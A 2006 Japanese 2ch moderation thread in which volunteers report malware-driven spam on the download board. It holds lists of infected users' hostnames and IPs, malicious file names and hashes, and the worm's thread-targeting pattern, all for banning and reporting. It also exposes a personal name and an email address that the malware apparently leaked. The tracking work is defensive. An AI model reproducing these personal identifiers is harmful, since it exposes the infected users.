X


■ウィルス爆撃相談所&焼き処【RockBBQ】

レス数が900を超えています。1000を超えると表示できなくなるよ。
2006/02/25(土) 23:49:54ID:???0
 ここはウィルス等を利用した爆撃等の相談所です。

 ウィルス感染ホストの報告と焼き処を兼ねます。

 #削除依頼は、削除整理板へお願いします。
 #ここでは芋掘りは行いません。専用スレでどうぞ。

【関連スレ】

【BBQ&BBM12本目】公開串登録所【ピンポイント規制】
http://qb5.2ch.net/test/read.cgi/sec2chd/1139102655/
bbs.cgi再開発プロジェクト7
http://qb5.2ch.net/test/read.cgi/operate/1130918407/
2006/03/26(日) 23:49:20ID:cYDtQz+d0
>>797
family.e-catv.ne.jp 59件 -> 共有ホスト
2006/03/27(月) 00:03:06ID:MgTnA3s80
【winny】うp研復活!TBSがファイル交換推奨【闇】
http://tmp6.2ch.net/test/read.cgi/download/1142461155/787
>787 名前: [名無し]さん(bin+cue).rar [sage] 投稿日: 2006/03/26(日) 23:06:28 ID:NrQVad+W0
> (アニソン) ヴァンドレッド ED[SiLC-himegoto].mp3,,0,0,79daa1562ae4080938f4cedc88b7a9f0,1
これ・・・

数年前にshinbiroから落としたからイラネ


【DSBL】PROXY規制中!【報告無用】39
http://qb5.2ch.net/test/read.cgi/sec2chd/1143184461/25-26
解決済みだったか。
2006/03/27(月) 00:44:34ID:???0
>>800-802 海外と逆引き不可はさっくりと永久で。
そして爆撃がやけに多いp8134-ipad09imazuka.yamagata.ocn.ne.jpも短期で。
807蒲焼 ★
垢版 |
NGNG
逆引き不可のはBooしてもらえると助かるお^^
2006/03/27(月) 11:54:01ID:???P
>>797の続きですー(3/26 13:41:35〜3/27 07:03:44)

112.82.168.203.megaegg.ne.jp 138件(>>801で報告)
FLH1Aan054.isk.mesh.ad.jp 37件(>>797,>>801とかで報告)
ntaich049253.aich.nt.ftth.ppp.infoweb.ne.jp 8件(>>801で報告)
zaq3a559766.zaq.ne.jp 6件
ZR077221.ppp.dion.ne.jp 6件
45.227.192.61.east.flets.alpha-net.ne.jp 4件
221.221.211.45 4件
222.170.43.158 3件(>>800で報告)
ZB058219.ppp.dion.ne.jp 2件(>>801で報告)
y077201.ppp.dion.ne.jp 1件
2006/03/27(月) 14:00:03ID:???0
>>808
まとめおつかれさまですー
2006/03/27(月) 14:11:32ID:???0
>>808
既に焼かれていたもの以外は処理しましたー
2006/03/27(月) 16:48:22ID:???P
>>810
お疲れ様ですー ありがとうございましたー
812名無しの報告
垢版 |
2006/03/27(月) 23:38:31ID:TPO5JgK+0
【Winny】エッチな4610のコンプを目指すスレ
ttp://tmp6.2ch.net/test/read.cgi/download/1143282788
「KaZaA…Shareaza…eMule…DC++…etc.」【XX】
ttp://tmp6.2ch.net/test/read.cgi/download/1136172490
[Winny Share] [DVDISO](18禁アニメ) Part.1
ttp://tmp6.2ch.net/test/read.cgi/download/1138684813

の3つのスレに 「金曜のウィルスと同様の内容」を 「age」 で連続書込みが発生しています。
感染者(?)はひとり(IDは1つ)のみですが、金曜のヤツの亜種かもしれません。
増えたら大変そうです。 

22:00 頃より3スレにほぼ均等に書込まれていて、既に合計120にもなっています。
ウィルスかどうかは判りませんが、気になるので報告しておきます。
813名無しの報告
垢版 |
2006/03/27(月) 23:49:02ID:TPO5JgK+0
>>812 の捕捉
age での書込IDが増えました。現在は2IDによる書き込みが行われています
2006/03/28(火) 01:51:08ID:lJ2rQQmw0
Share プラグイン・ツール総合 14.dll
ttp://tmp6.2ch.net/test/read.cgi/download/1137856068/

爆撃が始まりました
815名無しの報告
垢版 |
2006/03/28(火) 01:57:01ID:uOTw8Vwi0
>>813 の続報
本日(昨日22:00)登場の爆撃は blank age ですが、スレが埋まった後、次のスレに取り憑きました。
金曜日のとは挙動が異なります。

ttp://tmp6.2ch.net/test/read.cgi/download/1136172490
↑が埋まって↓に移動
ttp://tmp6.2ch.net/test/read.cgi/download/1137856068
2006/03/28(火) 09:44:24ID:Q9LVHSC30
【流出】トレンドマイクロ製品の営業資料など
http://live22x.2ch.net/test/read.cgi/news/1143324325/
ノートンで侵入者警報が出て再起動しないとν速を更新できなくなります
2006/03/28(火) 09:53:19ID:6HZ8YQcd0
じゃあやれば?
再起動でも除外でも。
2006/03/28(火) 16:45:03ID:???P
>>808の続きですー(3/27 20:24:03〜3/28 09:53:29)

O002196.ppp.dion.ne.jp 119件
softbank221079141136.bbtec.net 11件
softbank219018116093.bbtec.net 6件
ZD009040.ppp.dion.ne.jp 6件
softbank221032112026.bbtec.net 3件
EATcf-579p70.ppp15.odn.ne.jp 3件
i218-44-109-215.s02.a043.ap.plala.or.jp 3件
ntkuch007202.kuch.nt.adsl.ppp.infoweb.ne.jp 2件
ntkmmt034174.kmmt.nt.ftth.ppp.infoweb.ne.jp 2件
softbank221040073014.bbtec.net 1件
KHP059139060172.ppp-bb.dion.ne.jp 1件
819名無しの報告
垢版 |
2006/03/28(火) 18:21:32ID:HRyHyHVX0
download            222.148.149.196 (p2196-ipbf202toyamahon.toyama.ocn.ne.jp) 90

バーボンに引っかかってたやつ
2006/03/28(火) 19:47:34ID:HRyHyHVX0
download            211.11.88.246 (p4246-ipbf1011marunouchi.tokyo.ocn.ne.jp) 20
2006/03/28(火) 19:52:51ID:rnnHRg8T0
特に防御装甲バーボンのリストを報告しても何もない、はず。
ポートスキャンでhackでもしたら報告すれば良い。
822名無しの報告
垢版 |
2006/03/29(水) 08:17:40ID:WmzTT5nZO
保守
2006/03/29(水) 10:02:50ID:???0
えーと、ウイルス本体の検出状況とかはどうなってるんでしょー。

本体は見つかってるのかなー。
2006/03/29(水) 11:26:32ID:cjBUqGfH0
>>823
2chの動作報告はここで。 パート19
http://qb5.2ch.net/test/read.cgi/operate/1140600013/612
2006/03/29(水) 11:50:41ID:???0
>>824
それ1つじゃないと思いますけどー。
2006/03/29(水) 12:42:58ID:cjBUqGfH0
>>825
なんか偉そうだね
2006/03/29(水) 13:22:28ID:dUWOZonp0
ダウソ板の埋め立て爆撃は
winny、shareのスレタイを古い順に襲ってる?
2006/03/29(水) 14:21:05ID:ear9IZAJ0
>>823
(一般コミック・雑誌) [ジャンプ] [2006-17] DEATH NOTE 102 我慢.zip 9,552,344 817dac31436ec7b1f381b7ffba69b502

の中身が
Desuno102 .scr
Thums.db
2006/03/29(水) 15:53:13ID:gjBzOkMO0
進路予想貼ってる人がいるけど、コピペした方がいいのかな?
もう把握済み?
2006/03/29(水) 16:37:54ID:gjBzOkMO0
>>827
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/358-359

これの順番っぽいね
2006/03/29(水) 16:46:18ID:???P
>>818の続きですー(3/28 10:48:09〜3/29 12:58:11)

「Hit word」まだぁ〜、日本語でok、すべては無知な

softbank219049078102.bbtec.net 81件
aic9-p205.flets.hi-ho.ne.jp 41件
p1054-ipbfp01kagawa.kagawa.ocn.ne.jp 4件
ntkuch007202.kuch.nt.adsl.ppp.infoweb.ne.jp 1件
KHP059139060172.ppp-bb.dion.ne.jp 1件

>>823
お疲れ様ですー
「ダウン板小泉ウィルス(仮称)対策室」
http://aa5.2ch.net/test/read.cgi/nanmin/1142776192/
こちらの皆さんが書かれているようにスレタイからターゲット
となるスレを選んでいるようですー
ウィルス名は「Trojan.Kakkeys.D」でその亜種・新種については
不明のようですー
2006/03/29(水) 16:50:58ID:???0
>>828
どのタイプの書き込みがどれとかー、そういう整理は出来て
るんでしょうかねー。
そういうのを整理してくれると、どれが未決なのかとか判るんですがー。

アンチウイルスソフトの会社に本体送ってくれてる人とか、
連絡とれないですかねー。

他の方でもいいんですがー、そういう捜索&通報部隊と
情報整理してくれる人はいないかなーと。

鯖側の対応はroot ★さんとかが考えてくれますけどー、
それと平行して、発生源も潰していかないといけないなーと。

必要ならキャップも発行してもらえるよーに管理人さんにも
お願いするつもりでいますー。
2006/03/29(水) 16:59:13ID:???0
>>818
見ますー。
2006/03/29(水) 17:11:15ID:???0
>>818
焼きましたー。
続いて>>831行きまーす。
2006/03/29(水) 17:20:48ID:???0
>>831
既に焼かれていたもの以外は焼きましたー。
おつかれさまです。
2006/03/29(水) 17:51:43ID:r5tHxdxU0
>>832
>他の方でもいいんですがー、そういう捜索&通報部隊と
>情報整理してくれる人はいないかなーと。
ここの板にスレ立ててください。
837rafale ★
垢版 |
2006/03/29(水) 17:52:24ID:???0
>>836
このスレでいいじゃん
2006/03/29(水) 17:57:38ID:r5tHxdxU0
>>832
つ ttp://aa5.2ch.net/test/read.cgi/nanmin/1142776192/

ではだめなの?
2006/03/29(水) 18:42:49ID:???0
>>836
このスレに最初に「相談所」と付けたのは、一応これも想定してたんですー。

>>838
えーと、まとめ役とかそーゆー人が欲しいんですがー。

実際に探してきてくれる人とかは、勿論誰でもいいんですがー、
ウイルスだと認識したはいーけど、本体を送らないと
アンチウイルスソフトの会社は対応してくれない&できないわけでー。

これは危険だって情報交換はそこでやられてますけどー、
そういう部分をとりまとめてほしーなーと。

でないとー、そのスレを見た限られた人達は対応できてもー、
2ちゃんねるも見たことがないよーな人たちには意味がないんですよねー。

プロバイダへの通報って方向性も探ってますがー、Antinny騒ぎで
ウイルスソフトへの関心も増えてますから、まーそちらから攻める
方向性もあったらいーかなーと。

やってもいいなーという人がいたら、ここで宣言でもメールでも
いーんで連絡いただければー。
2006/03/29(水) 18:54:01ID:r5tHxdxU0
>>839
【同人誌】[Twinbunny(橘りうた)] Platonic Maiden(C68)[ローゼンメイデン](稀少).zip,,0,0,189cd80e2ff859f9c3ed855b7f77dd81,0,1,1
に 〜.exe が入ってて SymantecAntiVirus では〜として検出される
2chへは ny とついたスレに爆撃する

とか
(アルバム)[2006.02.01] hiro 「寛 スペシャル・ボックス」(全26曲 192k).zip,,0,0,e7d3116a6f77209e3f2370ab352951d9,0,1,1
に 〜.exe が入ってるけど SymantecAntiVirus では検出されない
2chへは winnyと付いている古いスレから爆撃
のようなまとめが必要なんだろうか?



ここに書いたやつは確実にウィルスが入ってます。 (2chへは被害無し)
2006/03/29(水) 19:03:15ID:r5tHxdxU0
2006/03/28 00:00以降無差別 まさしく外道
203.156.237.245 2 res ID:GCajYsnT0
61.177.25.157 1 res ID:YP1h0JJL0
220.173.159.3 3 res ID:+jHlQITo0
124.63.237.234 2 res ID:8igAYUgB0
211-74-8-174.adsl.dynamic.seed.net.tw 1 res ID:kLrhjFA10
218.20.60.202 1 res ID:pzqmLH2e0
152.21.66.223 1 res ID:JFiUe8C+0
203.64.236.186 1 res ID:bxanW8IL0
58.34.163.168 1 res ID:kXQdUqXI0
222.87.85.93 1 res ID:fWa/95cn0
58.53.62.183 1 res ID:rSC0bB5C0
202.103.217.204 2 res ID:IpUDAlgL0
222.68.131.38 1 res ID:OdYxMbqF0
219.128.84.59 2 res ID:V/zjBYD10
58.227.42.130 2 res ID:sOEEygw40
218-161-5-109.dynamic.hinet.net 1 res ID:AUmMWxHU0
218.18.34.159 1 res ID:24RsWlIM0
61.172.156.126 2 res ID:2AbfdOaQ0
211.218.221.105 1 res ID:wquzN4Ad0
125.131.107.253 1 res ID:oVH9UxQh0
59-112-232-5.dynamic.hinet.net 3 res ID:vCrObFv20
221.234.210.201 5 res ID:fA9iOjhs0
203-70-99-71.adsl.dynamic.seed.net.tw 1 res ID:gbpeLLls0
d150-138-213.home.cgocable.net 1 res ID:9+GmE27E0
59-112-169-252.dynamic.hinet.net 1 res ID:RiJL1e1S0
203-70-98-81.adsl.dynamic.seed.net.tw 1 res ID:3ornWeT00
2006/03/29(水) 19:14:37ID:r5tHxdxU0
        ___
     _ /: : : : : ̄:`ー、
   /: : : : : : : : : : : \_
_/: : : :/ /:∧ヽ ヽヽ: :\: : } `==、
. /: :/: /: /: /: |u |:ヽ: ヽ:ヽ: : .}: :| ト、: :〉|
/: :/: /: /: /|: :| .∧Lュ___,ノヽ: :|: |ミいV_∧
|: /|: :/: /__レ'V /  リ  ヽ|\V: :∧.ハ Vヘ: |
V: :|: /: 「 ∨       ___ レくヽ.| V | |:|
/: ∧|: : :ハ  __    " ̄ ̄` |: レ'  |/ レ
|:./ |:/人|:.|./ ̄ `      /:/:.|: |  /
V ∨  |`| /:/:    _    /|: /     〆
   \. |: :|〉、__   <_ノ _ /|/レへ、
ヽヽ.  `|V  /  ̄「_フ^「__,/|/__ 」
.     レ'∨  ヽ / /_从‐く| /   |   ゝ
       ̄`ー-、./じVー|V |_/     |  ゝ
          /  └┘ | ̄ ̄ ̄│
          |      .|     |
http://tmp6.2ch.net/test/read.cgi/download/1143041017/29 2006/03/23 00:24:34 ID:1D3Vestf0
http://tmp6.2ch.net/test/read.cgi/download/1143112518/27 2006/03/23 20:16:09 ID:1D3Vestf0
http://tmp6.2ch.net/test/read.cgi/download/1143212713/27 2006/03/25 00:07:25 ID:71njDhma0
http://tmp6.2ch.net/test/read.cgi/download/1143447574/994 2006/03/28 00:22:46 ID:xPpLYRfy0
http://tmp6.2ch.net/test/read.cgi/download/1143528373/20 2006/03/28 15:47:46 ID:f7qJkRne0
http://tmp6.2ch.net/test/read.cgi/download/1143543516/67 2006/03/28 20:02:25 ID:f7qJkRne0
コピペ多すぎな板だった
2006/03/29(水) 19:21:32ID:r5tHxdxU0
md5 : 7a9005d6b6db4d0f1a635148101f7431 size : 119
679 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/26 15:48:52 ID:M2KAVwPx0
(DVDISO) ドラゴンボールGT DRAGON BALLGT DVD-BOX DISC08(一層化+rr3%).part1.rar,,0,0,580e3d0aaff2a31144c00ab0603c886d,1

http://tmp6.2ch.net/test/read.cgi/download/1142461155/679 2006/03/26 15:48:52 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/230 2006/03/26 20:14:38 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1142461155/845 2006/03/27 02:03:20 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/306 2006/03/27 02:03:55 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142512174/557 2006/03/27 22:20:04 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142512174/723 2006/03/28 05:41:55 ID:VcGUx4vp0
md5 : 5eec148f09ba4f1c16b3095051daee58 size : 119
677 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/26 15:47:15 ID:M2KAVwPx0
(DVDISO) ドラゴンボールGT DRAGON BALLGT DVD-BOX DISC01(一層化+rr3%).part2.rar,,0,0,5e85b73cd8ea9815449e894431617cb8,1

http://tmp6.2ch.net/test/read.cgi/download/1142461155/677 2006/03/26 15:47:15 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/164 2006/03/26 15:41:49 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/233 2006/03/26 20:16:17 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/367 2006/03/27 18:08:35 ID:od84BWko0
md5 : b90f3f20c575dc244c2b6b5dfad21c28 size : 119
674 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/26 15:45:34 ID:M2KAVwPx0
(DVDISO) ドラゴンボールGT DRAGON BALLGT DVD-BOX DISC03(一層化+rr3%).part4.rar,,0,0,2802730479e8cf5238571b1a41366e5d,1

http://tmp6.2ch.net/test/read.cgi/download/1142461155/674 2006/03/26 15:45:34 ID:M2KAVwPx0
http://tmp6.2ch.net/test/read.cgi/download/1143282788/389 2006/03/27 18:15:49 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/379 2006/03/27 18:18:31 ID:od84BWko0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/466 2006/03/27 22:22:14 ID:od84BWko0
追跡は可能かも
ログ堀して一人ずつ潰していく?
2006/03/29(水) 19:39:10ID:r5tHxdxU0
md5 : 342a69ff201c47d240cd742ad5e86800 size : 10
904 名前:[名無し]さん(bin+cue).rar [sage] 投稿日:2006/03/24 13:04:46 ID:oQXQ0MP20
ベ・ユミ
http://tmp6.2ch.net/test/read.cgi/download/1139757423/904 2006/03/24 13:04:46 ID:oQXQ0MP20
http://tmp6.2ch.net/test/read.cgi/download/1139757423/916 2006/03/24 13:12:49 ID:oQXQ0MP20
http://tmp6.2ch.net/test/read.cgi/download/1143282788/405 2006/03/27 19:12:57 ID:89F0Ckea0
http://tmp6.2ch.net/test/read.cgi/download/1142616654/599 2006/03/28 13:40:32 ID:qnvydZVs0
http://tmp6.2ch.net/test/read.cgi/download/1142512174/760 2006/03/28 13:46:26 ID:qnvydZVs0

フタコイオルタナティブのOP探してるっぽい

ID:52Zu+vUA0 は今日かかったっぽい
欲張りすぎ
http://tmp6.2ch.net/test/read.cgi/download/1140965580/355 2006/03/29 17:20:49 ID:52Zu+vUA0
【HIPHOP】【Album】2003.09.23-Outkast - Speakerboxxx The Love Below(2枚組).zip.mp3,,0,0,cf053922da4abf6e5e8a3b4ab726e9c9,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/315 2006/03/29 17:21:28 ID:52Zu+vUA0
【HIPHOP】【シングル】【洋楽】2pac & snoop doggy dog - hypnotize (remix).mp3,,0,0,d578cc0b37ee48ed94abe39ce0ba3d59,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/362 2006/03/29 17:23:27 ID:52Zu+vUA0
【HIPHOP】【アルバム】【洋楽】2Pac - Until The End Of Time.zip,,0,0,3414d4540478661ec46f453fa485f541,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/322 2006/03/29 17:24:06 ID:52Zu+vUA0
[Album][Jazz]Erroll Garner - 1944-1945.zip.mp3,,0,0,33d1bf5f18d12eb7d1297d67a9a94a2f,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/370 2006/03/29 17:26:05 ID:52Zu+vUA0
(アニメサントラ)機動警察パトレイバー PATLABOR CDBOX DELUXE(3Discs).zip,,0,0,652fcd02de0016aca2d61c2ed33359c4,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/329 2006/03/29 17:26:44 ID:52Zu+vUA0
(一般コミック・雑誌) [マガジン] [2005-18] [瀬尾公治] 涼風-SUZUKA- No.055.zip,,0,0,8c4f5d9231bec0ffe2d3b29ea06ddb88,1
↓つづく
2006/03/29(水) 19:40:13ID:r5tHxdxU0
http://tmp6.2ch.net/test/read.cgi/download/1141337563/350 2006/03/29 17:34:38 ID:52Zu+vUA0
(一般コミック) (み) [美樹本晴彦] 機動戦士ガンダム Ecole du Ciel -天空の学校- 第04巻.zip,,0,0,f92fab399960196555649c9c14c5b22f,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/357 2006/03/29 17:37:16 ID:52Zu+vUA0
[ALBUM]Fantastic Plastic Machine - Les Plus.zip,,0,0,d9b110c415aef07b87e201101b2d18b5,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/364 2006/03/29 17:39:54 ID:52Zu+vUA0
[sports] 【フィギュアスケート】 Sarah Hughes 2002 Olys Ex - Youl'll Never Walk Alone.wmv,,0,0,f398cffb5eb091449c2e867a1f47dc27,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/413 2006/03/29 17:41:54 ID:52Zu+vUA0
【HIPHOP】【Album】2003.09.23-Outkast - Speakerboxxx The Love Below(2枚組).zip.mp3,,0,0,cf053922da4abf6e5e8a3b4ab726e9c9,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/371 2006/03/29 17:42:33 ID:52Zu+vUA0
【HIPHOP】【シングル】【洋楽】2pac-I Wonder If Heaven Got a Ghetto(Hiphop Instrumental).mp3,,0,0,3fece601f150a1807cb244489124ae3f,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/421 2006/03/29 17:44:32 ID:52Zu+vUA0
加藤登紀子 - 時には昔の話を(久石譲 - 紅の豚).mp3,,0,0,220e0d02c04514d73bbc78f071f23ae7,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/378 2006/03/29 17:45:11 ID:52Zu+vUA0
[Album][Jazz]Erroll Garner - 1944-1945.zip.mp3,,0,0,33d1bf5f18d12eb7d1297d67a9a94a2f,1
http://tmp6.2ch.net/test/read.cgi/download/1141337563/385 2006/03/29 17:47:49 ID:52Zu+vUA0
(お宝) 杏さゆり 迫力の巨乳.jpg.lzh,,0,0,c59d552d5da3efa271471b0a4494894f,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/436 2006/03/29 17:49:48 ID:52Zu+vUA0
【HIPHOP】【シングル】【洋楽】2pac & snoop doggy dog - hypnotize (remix).mp3,,0,0,d578cc0b37ee48ed94abe39ce0ba3d59,1
http://tmp6.2ch.net/test/read.cgi/download/1140965580/444 2006/03/29 17:52:27 ID:52Zu+vUA0
img20031223002421 杏さゆり 超絶お尻(2).jpg.lzh,,0,0,ccbb8fcef6cd0b1deedcf5303ce5cc16,1
2006/03/29(水) 22:38:17ID:r5tHxdxU0
酷いんで・・・ ログ堀用
ID:52Zu+vUA0 492 res
http://tmp6.2ch.net/test/read.cgi/download/1139884353/779 2006/03/29 01:36:37 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/798 2006/03/29 01:42:04 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/819 2006/03/29 01:46:50 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/822 2006/03/29 01:47:29 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/849 2006/03/29 01:54:18 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/853 2006/03/29 01:55:39 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/862 2006/03/29 01:59:04 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/886 2006/03/29 02:08:08 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/901 2006/03/29 02:13:40 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/919 2006/03/29 02:19:07 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1139884353/923 2006/03/29 02:21:10 ID:52Zu+vUA0
1/3
2006/03/29(水) 22:38:58ID:r5tHxdxU0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/610 2006/03/29 12:28:03 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/614 2006/03/29 12:29:24 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/621 2006/03/29 12:32:48 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/629 2006/03/29 12:35:30 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/633 2006/03/29 12:37:33 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140684650/506 2006/03/29 12:39:33 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/642 2006/03/29 12:41:36 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/648 2006/03/29 12:43:39 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/653 2006/03/29 12:46:21 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140684650/520 2006/03/29 12:47:00 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140401603/658 2006/03/29 12:49:01 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140684650/525 2006/03/29 12:49:40 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1140684650/530 2006/03/29 12:52:18 ID:52Zu+vUA0
2/3
2006/03/29(水) 22:39:41ID:r5tHxdxU0
http://tmp6.2ch.net/test/read.cgi/download/1141039876/733 2006/03/29 20:36:34 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141337563/928 2006/03/29 20:37:14 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141337563/953 2006/03/29 20:42:31 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141039876/772 2006/03/29 20:44:31 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141337563/965 2006/03/29 20:45:10 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141039876/785 2006/03/29 20:47:09 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141337563/977 2006/03/29 20:47:48 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141039876/799 2006/03/29 20:49:47 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141337563/988 2006/03/29 20:50:26 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141039876/814 2006/03/29 20:52:27 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141039876/825 2006/03/29 20:54:26 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141357990/228 2006/03/29 20:55:05 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141039876/837 2006/03/29 20:57:04 ID:52Zu+vUA0
http://tmp6.2ch.net/test/read.cgi/download/1141357990/250 2006/03/29 21:00:26 ID:52Zu+vUA0
3/3
849名無しの報告
垢版 |
2006/03/29(水) 23:17:42ID:qUJiBVhE0
24日のウイルスの亜種だったようです。ついにプロバイダーが動くに対してfusiana投稿しました。

ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/228

228 :0 p3201-ipad01sasajima.aichi.ocn.ne.jp :2006/03/29(水) 23:06:04 ID:n8nXqcE30
佐藤 貴之

以下省略


【Share】国内ドラマ専用スレPar11【ハイビジョン】
http://tmp6.2ch.net/test/read.cgi/download/1141357990/l50
トルコ風呂で皆既日食だって? 1703
http://tmp6.2ch.net/test/read.cgi/download/1143630933/l50
【野外露出】人ごみの中で全裸になる動画【Winny】4
http://tmp6.2ch.net/test/read.cgi/download/1141217092/l50

での投稿を確認しました。
2006/03/29(水) 23:40:53ID:r5tHxdxU0
(アニメ) 星方天使エンジェルリンクス 第09章 「良禽択木」 (LD 640x480 WMV9 QB93 120fps).avi,oos5qf7hrv,0,0,89f53b68715041cd3edad976b7792ef9,1
が落ちてこない・・・


ダウンロード板の爆撃種類
1.〜まだぁ〜? の爆撃 (書き込み内容が違う亜種有り)
2.>849 のようなやつ (亜種も?)
3.tab1.txt,tab2.txt,download.txtのファイル内容を一行ごと書き込む (Symantecからウィルス判定)
4.ほかにあったっけ?
851kctv79169.ccnw.ne.jp
垢版 |
2006/03/30(木) 00:25:15ID:d3zttCMS0
ついにプロバイダーが動く
http://tmp6.2ch.net/test/read.cgi/download/1142594523/235

235 :0 nissin45079.ccnw.ne.jp :2006/03/30(木) 00:13:15 ID:XXsBPx4M0
パピヨン:*eiryu04jp@hotmail.co.jp


以下省略

確認してませんが>>849と同じく暴れまわってると思われます。
・・・地方のCATVなのによりによって同じプロバの感染者を見るとは・・・
ちなみにこちらは↑の通り
2006/03/30(木) 00:27:40ID:d3zttCMS0
参考までに
うちのプロバはなかなかホスト名が切り替わりません。MACを変更するとすぐにIPが変わりますが。

・・・あーあー自分のホスト名ばらしちゃったw
2006/03/30(木) 02:03:13ID:n0XhNeWiO
人探ししてるのに、ウイルスファイルの情報貼り付けてどうしたいんだろう。
NGNG
なんだか、錯綜しているようだなぁー。

・ウイルス本体の検出状況とか
・どのタイプの書き込みがどれとかー、そういう整理
・で、どれが未決なのかとかの整理
など
をまとめてくれる人

をやれる人待ちのようで。
>>823>>832>>839

>やってもいいなーという人がいたら、ここで宣言でもメールでも
>いーんで連絡いただければー。
2006/03/30(木) 11:17:50ID:PsOFPqjh0
書類が揃ってないから対処しないお役所仕事のようですなw

ボランティアが大変なのもわかってはいますが、善意の通報者とボランティアとの間に
おかしな距離があるのが気になります。 事態はどんどん先に進んでいます。
2006/03/30(木) 11:42:35ID:gVwl07Wv0
> ・ウイルス本体の検出状況とか
現在発見されているウイルス(らしき物)は全て検出されます

> ・どのタイプの書き込みがどれとかー、そういう整理
ageタイプとsageタイプの2種類
ウイルス自体が違うのか環境によってagesage切り替えるのかは不明
ageタイプはスレタイが/winny|share|\d\d\d\d/iにマッチしdat番号が古いもの
sageタイプはスレタイが/winny|share/にマッチしdat番号が古いもの
に爆撃

> ・で、どれが未決なのかとかの整理
不明
2006/03/30(木) 12:06:04ID:???0
うーん。情報整理をやるぞー、という人はいないのかなー。

そうすると、そういう情報まとめるスレなりをやはり別に作る
必要あるのかなー。そこに必要な情報を集約していくとかー。

>>855
心配してるのは情報の漏れとゆーか、そういう部分ですー。
通報漏れとかー。

アンチウイルスで検出できるものは、もう心配ないわけですがー、
(それを集めてきても意味はないですー。ユーザーへの注意喚起は
また別の話なのでー)、実際の所検出されるものがどーゆー荒らし方を
してるのかと(投稿パターンがわかれば、対応状況が整理できる)、
まだ本体が発見されてないものを、投稿開始時期から絞っていけるかなーと。

wikiに整理したらいーのかなー。投稿パターンごとにー。

>>856
どうもですー。
そういう感じのを、もっと個別に詳しく煮詰めていければなーと。
2006/03/30(木) 12:15:25ID:1fFYlHSU0
まとめを入れた報告あきらめたー。 人→1

現在は無差別のみ
裏でこそこそとやってるだけ
2006/03/30(木) 12:17:07ID:???0
あー、パターン毎にテンプレで整理すればいーのかなー。
例えばこんな感じー。亜種はどんどん区別するって感じでー。

【通称】 ●●● typeE
【爆撃開始時期】 2006/03/01
【投稿の特徴など】
 ・sageで書き込む
 ・○○.txtの内容をランダムに投稿
 ・一番上の○○というタイトルスレに投稿 
 ・・・・
 ・・・・
【本体確認状況】 2006/3/12に確認(通報済み)
 http://qb5.2ch.net/test/read.cgi/sec2chd/***********/256

